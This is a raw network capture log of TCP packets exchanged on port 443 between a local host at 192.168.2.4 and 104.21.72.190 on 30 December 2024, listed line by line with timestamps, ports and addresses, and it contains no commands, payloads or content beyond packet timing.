                                                                                    Dec 30, 2024 09:18:11.053462982 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.053477049 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.053626060 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.053656101 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.053684950 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.053692102 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.053718090 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.086222887 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.086272955 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.086292982 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.086323023 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.086396933 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.128357887 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.128381014 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.128468990 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.128490925 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.129693031 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.131711960 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.131753922 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.131787062 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.131794930 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.131825924 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.133399010 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.133414984 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.133476973 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.133483887 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.133521080 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.133673906 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.133692026 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.133739948 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.133747101 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.135703087 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.135742903 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.135771990 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.135777950 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.135809898 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.135829926 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.137528896 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137546062 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137608051 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.137614012 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137661934 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.137814045 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137849092 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137880087 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.137886047 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.137917042 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.138003111 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.138030052 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.138056993 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.138063908 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.138088942 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.170730114 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.170780897 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.170813084 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.170824051 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.170850992 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.210309982 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.212626934 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.212706089 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.216192007 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.216207027 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.216250896 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.216288090 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.216289043 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.216303110 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.216325045 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.216352940 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.218002081 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.218019009 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.218076944 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.218084097 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.218135118 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.219400883 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.219417095 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.219487906 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.219495058 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.219538927 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.221900940 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.221918106 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.221978903 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.221987009 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222141027 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222160101 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.222166061 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222179890 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222193956 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.222228050 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.222409964 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222424984 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222476959 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.222482920 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.222532034 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.255371094 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.255395889 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.255479097 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.255502939 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.255544901 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.297250986 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.297311068 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.297327042 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.297348976 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.297365904 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.297384024 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.300674915 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.300689936 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.300744057 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.300754070 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.300827026 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.302306890 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.302321911 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.302382946 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.302391052 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.302434921 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.303822041 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.303838015 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.303880930 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.303889036 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.303921938 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306402922 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306417942 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306468964 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306476116 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306510925 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306530952 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306555986 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306562901 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306583881 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306607962 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306807041 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306823969 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306858063 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306865931 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.306888103 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.306906939 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.339777946 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.339795113 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.339936018 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.339936018 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.339965105 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.340013027 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.381736994 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.381761074 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.381815910 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.381829023 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.381869078 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.385216951 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.385234118 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.385288000 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.385294914 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.385324955 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.385344028 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.386894941 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.386910915 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.386960983 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.386969090 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.387017965 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.388320923 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.388338089 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.388375044 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.388382912 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.388407946 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.388427973 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.390707970 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.390722990 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.390767097 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.390774012 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.390799999 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.390827894 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.390964031 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.390979052 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.391030073 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.391036987 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.391191006 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.391352892 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.391375065 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.391427994 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.391436100 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.391479969 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.424181938 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.424201012 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.424254894 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.424263954 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.424299002 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.466233969 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.466267109 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.466310978 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.466321945 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.466356039 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.466372967 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.469624996 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.469643116 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.469728947 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.469737053 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.470937967 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.471362114 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.471379042 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.471438885 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.471446991 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.471856117 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.472551107 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.472565889 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.472625971 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.472640038 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.472728014 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475064993 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475089073 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475148916 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475156069 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475239038 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475343943 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475361109 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475425005 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475430965 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475493908 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475619078 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475636005 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475688934 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.475696087 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.475744963 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.508635044 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.508656979 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.508723021 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.508738041 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.508785009 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.550646067 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.550683022 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.550750971 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.550769091 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.550801992 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.550826073 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.554121017 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.554138899 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.554199934 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.554215908 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.554505110 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.555669069 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.555686951 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.555751085 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.555757046 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.555797100 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.557071924 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.557087898 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.557131052 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.557137966 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.557173967 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.559670925 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559685946 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559746981 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.559758902 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559798002 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.559827089 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559849024 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559879065 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.559885979 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.559916019 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.559932947 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.560115099 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.560129881 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.560179949 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.560188055 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.560337067 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.593131065 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.593147039 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.593211889 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.593229055 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.593408108 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.635242939 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.635268927 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.635329962 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.635344982 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.635355949 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.635440111 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.638639927 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.638657093 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.638730049 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.638745070 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.638945103 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.640053988 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.640069008 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.640134096 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.640149117 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.640187025 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.641469955 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.641488075 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.641547918 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.641556025 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.641593933 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644123077 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644141912 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644200087 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644206047 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644258022 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644267082 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644283056 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644330978 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644336939 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644386053 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644596100 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644612074 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644654989 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644660950 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.644689083 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.644711018 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.677973986 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.677990913 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.678045988 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.678055048 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.678083897 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.678097010 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.719553947 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.719572067 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.719624996 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.719635010 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.719666004 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.719685078 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.722912073 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.722928047 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.722981930 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.722989082 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.723016024 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.723045111 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.724700928 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.724715948 CET44349730104.21.72.190192.168.2.4
                                                                                    Dec 30, 2024 09:18:11.724761963 CET49730443192.168.2.4104.21.72.190
                                                                                    Dec 30, 2024 09:18:11.724769115 CET44349730104.21.72.190192.168.2.4
